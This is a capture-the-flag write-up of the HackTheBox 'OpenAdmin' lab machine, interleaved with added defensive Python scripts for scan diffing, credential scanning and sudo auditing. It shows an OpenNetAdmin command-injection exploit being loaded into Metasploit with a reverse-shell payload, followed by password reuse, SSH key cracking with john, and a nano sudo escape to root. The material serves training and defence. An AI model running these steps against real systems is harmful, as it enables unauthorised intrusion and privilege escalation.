HackTheBox Openadmin Write Up
2 May 2020
Let's see what we have got here with nmap.
nmap -sC -sV -O -oA nmap/initial 10.10.10.171
-sC: run default script scan
-sV: probe open ports to determine service/version info
-O: OS detection
-oA: write the output in all three formats (normal, grepable and XML) to files with the given basename
Nmap returns results quickly because by default it scans only the 1000 most popular ports, so let's scan all ports in the background while we investigate the initial scan.
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.171
-p-: scans from port 1 to 65535, same as -p1-65535
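The -oA option above leaves a grepable .gnmap file beside the normal and XML output, which is the form most easily consumed by scripts. The following added example (my code, not part of the original write up) parses that format and diffs two scans, which is how a defender would use the same data: any listener that appears since an approved baseline scan is an asset-inventory finding. The host, ports and version strings in the embedded samples are constructed for the example and are not this box's real results.

```python
from dataclasses import dataclass

# Constructed samples of nmap's greppable (.gnmap) output, one of the three files
# that -oA writes. Host, ports and version strings are illustrative only, not the
# box's real scan results.
BASELINE_GNMAP = """\
# Nmap 7.80 scan initiated Sat May  2 10:00:00 2020 as: nmap -sC -sV -O -oA nmap/initial 10.10.10.171
Host: 10.10.10.171 ()\tStatus: Up
Host: 10.10.10.171 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 (example)/, 80/open/tcp//http//Apache httpd 2.4 (example)/, 443/closed/tcp//https///\tIgnored State: closed (997)\tOS: Linux 4.x (example)
# Nmap done at Sat May  2 10:00:30 2020 -- 1 IP address (1 host up) scanned in 30.00 seconds
"""

# A later full-port scan (-p-) of the same host, constructed so that one extra
# service has appeared since the baseline.
LATER_GNMAP = """\
Host: 10.10.10.171 ()\tStatus: Up
Host: 10.10.10.171 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 (example)/, 80/open/tcp//http//Apache httpd 2.4 (example)/, 8080/open/tcp//http-proxy//(example)/\tIgnored State: closed (65532)
"""


@dataclass(frozen=True)
class OpenPort:
    host: str
    port: int
    proto: str
    service: str
    version: str


def open_ports(gnmap_text):
    """Return one OpenPort per port that nmap reported as open."""
    found = []
    for line in gnmap_text.splitlines():
        # Only "Host:" lines that carry a "Ports:" field describe scan results;
        # "Status:" lines and "# Nmap" comment lines are skipped.
        if not line.startswith("Host:") or "\tPorts:" not in line:
            continue
        fields = {}
        for chunk in line.split("\t"):
            key, _, value = chunk.partition(": ")
            fields[key] = value
        host = fields["Host"].split()[0]  # "10.10.10.171 ()" -> "10.10.10.171"
        for entry in fields["Ports"].split(", "):
            # Each entry is port/state/protocol/owner/service/rpcinfo/version/
            parts = entry.split("/")
            port, state, proto, _owner, service, _rpc = parts[:6]
            version = "/".join(parts[6:-1])  # drop the trailing empty field
            if state == "open":
                found.append(OpenPort(host, int(port), proto, service, version))
    return found


def new_listeners(baseline_text, current_text):
    """Open ports present in the current scan but not in the baseline.

    Anything returned here is a service that was not in the approved inventory
    and needs explaining, whether it is a forgotten admin panel or a backdoor.
    """
    known = {(p.host, p.port, p.proto) for p in open_ports(baseline_text)}
    return [p for p in open_ports(current_text)
            if (p.host, p.port, p.proto) not in known]


if __name__ == "__main__":
    for p in open_ports(BASELINE_GNMAP):
        print(f"{p.host}:{p.port}/{p.proto}  {p.service}  {p.version}")
    for p in new_listeners(BASELINE_GNMAP, LATER_GNMAP):
        print(f"NEW since baseline: {p.host}:{p.port}/{p.proto} ({p.service})")
```

Point it at the real files by reading nmap/initial.gnmap and nmap/full.gnmap into the two arguments; the version field is taken verbatim, which is what you later compare against advisories for the products it names.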
Let’s look at the http server.
The page has the default Apache 2 page, so let’s fire up gobuster.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.171 -x php,html -t 100
-w: use a wordlist
-u: target url
-x: search for extensions
-t: number of threads to run
Gobuster found /music; if we take a look at it we find a reference to 10.10.10.171/ona. This could also have been found with DirBuster, which can parse HTML and follow the links it finds. Gobuster doesn't offer this functionality, but it's much faster. Let's enumerate /ona.
Looks like some sort of an admin panel. Let's inspect further: it's running OpenNetAdmin version 18.1.1, which is not the latest version. We can run searchsploit to look for OpenNetAdmin exploits.
Exploiting OpenNetAdmin with command injection exploit
So we have an exploit for the exact version this server is running. We can copy 47772.rb into Metasploit. If you import exploits into Metasploit, run reload_all in msfconsole after copying the module.
searchsploit -m exploits/php/webapps/47772.rb
cp 47772.rb /usr/share/metasploit-framework/modules/exploits/linux/http/
After the modules have been reloaded we can use the exploit. Make sure to set every required option:
set lhost <your ip, run "ip addr" to find it>
set rhost 10.10.10.171
set payload linux/x64/shell_reverse_tcp
After using this payload we get a shell as www-data. You can see who you are with
Privilege escalation with db password
Now we need to escalate privileges. Let’s see who is using this machine.
We have Jimmy and Joanna. Let's enumerate the directory we are thrown in. You have to check every folder from here. The key to escalating privileges is finding the ./local/config folder. We have a file with a clear text password for the database.
Now we can assume one of the users was sloppy and reused the same password for their account. Let's try to ssh into one of them.
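The clear-text database password above is the kind of thing a secrets scan over the deployed web root catches before an attacker does. The following added example (my code, not part of the original write up and not OpenNetAdmin's own code) flags config lines whose credential-like key holds a literal value, while letting environment references and placeholders through. The file names and values in the embedded sample tree are constructed for the example; scan_tree() runs the same check over a real directory.

```python
import os
import re

# Credential-like keys followed by a value. The value must be a literal; references
# to environment variables or templating are what we want to see instead.
CRED_RE = re.compile(
    r"""(?P<key>\w*(?:pass(?:w(?:or)?d)?|pwd|secret|token)\w*)['"]?\s*(?:=>|=|:)\s*['"]?(?P<val>[^'"\s,;)]+)""",
    re.IGNORECASE,
)
PLACEHOLDERS = {"changeme", "password", "secret", "xxx", "todo", "null", "none"}

# Constructed sample of a deployed web root. File names and values are made up
# for the example; they are not the application's real files.
SAMPLE_FILES = {
    "local/config/database.inc.php": (
        "<?php\n"
        "$db_config = array(\n"
        "  'DEFAULT' => array(\n"
        "    'db_login' => 'example_user',\n"
        "    'db_passwd' => 'ExamplePassw0rd!',\n"
        "  ),\n"
        ");\n"
    ),
    "config/app.ini": "[db]\nhost = localhost\npassword = ${DB_PASSWORD}\n",
    "README.md": "Set DB_PASSWORD in the environment; never commit passwords.\n",
}


def is_literal_secret(value):
    """True when the value is an actual secret rather than an indirection or stub."""
    if value.startswith(("$", "%", "{{", "@")):
        return False
    return value.lower() not in PLACEHOLDERS


def scan_files(files):
    """Return (path, line number, key) for every hard-coded credential found."""
    findings = []
    for path, content in files.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            for m in CRED_RE.finditer(line):
                if is_literal_secret(m.group("val")):
                    findings.append((path, lineno, m.group("key")))
    return findings


def scan_tree(root):
    """Same check over a real directory on disk (binary files are read leniently)."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
            except OSError:
                continue
    return scan_files(files)


if __name__ == "__main__":
    for path, lineno, key in scan_files(SAMPLE_FILES):
        print(f"{path}:{lineno}: literal credential in '{key}'")
```

The fix for a hit is the one the README line in the sample describes: move the value into the environment or a secrets store, and make sure the config file is not readable by the web server's group or by other local users, since a low-privileged shell such as www-data is exactly the account that reads it here.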
So we can ssh in as Jimmy, but his home doesn't contain user.txt, so joanna is the user we have to own. Now this is a bit tricky. We have to enumerate again. The directory /var/www seems to hold a server of some sort.
Weird server on localhost
So if we can access the server it will output the ssh private key for joanna. Amazing, but how do we access it? Let's run netstat -lt.
-l: listening connections
-t: TCP connections
So we have an unusual port 52846 listening on localhost. We can curl it from the ssh session, as we can't reach it from the browser.
We’ve got a webpage, let’s access that main.php file from before.
Cracking the hash with John
Now that we have the id_rsa key for joanna we have to decrypt it, i.e. recover the passphrase protecting the private key. Copy the key to your machine, save it as id_rsa, and copy the ssh2john script so we can run john on this key.
kali@kali:~/openadmin$ cp /usr/share/john/ssh2john.py .
Pipe the output to a file:
kali@kali:~/openadmin$ ./ssh2john.py id_rsa > hash.txt
We have the password: bloodninjas. Now let's connect as Joanna.
From here we can cat user.txt and we have the user flag.
joanna@openadmin:~$ cat user.txt
c9b2c...
Getting root is fairly easy. Each time you log in as a user, try running sudo -l to see if anything can be run as root and exploited to gain a shell. Luckily we do have a command we can run as root.
If you find any command that can be run as root you should check GTFOBins; it lists ways to break out of a restricted environment with common binaries. Now run the above mentioned command as root and get a shell as root. (Note: you can also use the file-read GTFOBin.)
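The sudo -l check above is just as useful from the administrator's side: the same output tells you which sudoers entries hand out more than intended. The following added example (my code, not part of the original write up) parses the "may run the following commands" section and flags entries whose binary is an editor, pager or interpreter of the kind GTFOBins catalogues, with the usual fix for each. The sudo -l text embedded in it is constructed for the example; the entries are not this box's real sudoers.

```python
import re

# Binaries that, when allowed via sudo, let the caller spawn a shell or read/write
# arbitrary files as the target user (the classes GTFOBins catalogues).
SHELL_CAPABLE = {
    "nano", "vi", "vim", "less", "more", "man", "awk", "find", "env",
    "python", "python3", "perl", "ruby", "bash", "sh", "zsh",
}
EDITORS = {"nano", "vi", "vim"}

# One "(runas) [TAG: ...] command" line from the "may run" section of sudo -l.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

# Constructed sudo -l output; the entries are examples, not the box's real sudoers.
SAMPLE_SUDO_L = """\
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/example.txt
    (root) /sbin/reboot
"""


def parse_sudo_l(text):
    """Return (runas, tags, command) for each allowed command in sudo -l output."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            entries.append((m.group("runas"), tags, m.group("cmd")))
    return entries


def audit(entries):
    """Flag entries that grant more than the administrator probably intended."""
    findings = []
    for runas, tags, cmd in entries:
        if cmd == "ALL":
            findings.append((cmd, "unrestricted command set",
                             "restrict to the specific commands actually needed"))
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary not in SHELL_CAPABLE:
            continue
        reason = f"{binary} can spawn a shell or write arbitrary files as {runas}"
        if "NOPASSWD" in tags:
            reason += ", without a password"
        if binary in EDITORS:
            # sudoedit copies the file out, runs the editor as the invoking user,
            # and copies it back, so an editor escape gains nothing.
            fix = "use sudoedit on the specific file so the editor runs as the invoking user"
        else:
            fix = "wrap the needed operation in a script that takes no user-controlled input"
        findings.append((cmd, reason, fix))
    return findings


if __name__ == "__main__":
    for cmd, reason, fix in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{cmd}\n  risk: {reason}\n  fix:  {fix}")
```

Run it with the real output by feeding sudo -l's text to parse_sudo_l(); the constrained command in the sample is flagged even though it names a single file, because restricting the argument does not restrict what the editor can do once it is running as root.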
Privilege escalation with Nano
You might get confused as the first few commands will overwrite nano's interface, but just navigate to root.txt.
$ whoami
root
$ cat /root/root.txt
2f907...
This is how I managed to gain root on this box. Hope you learned something through this write up.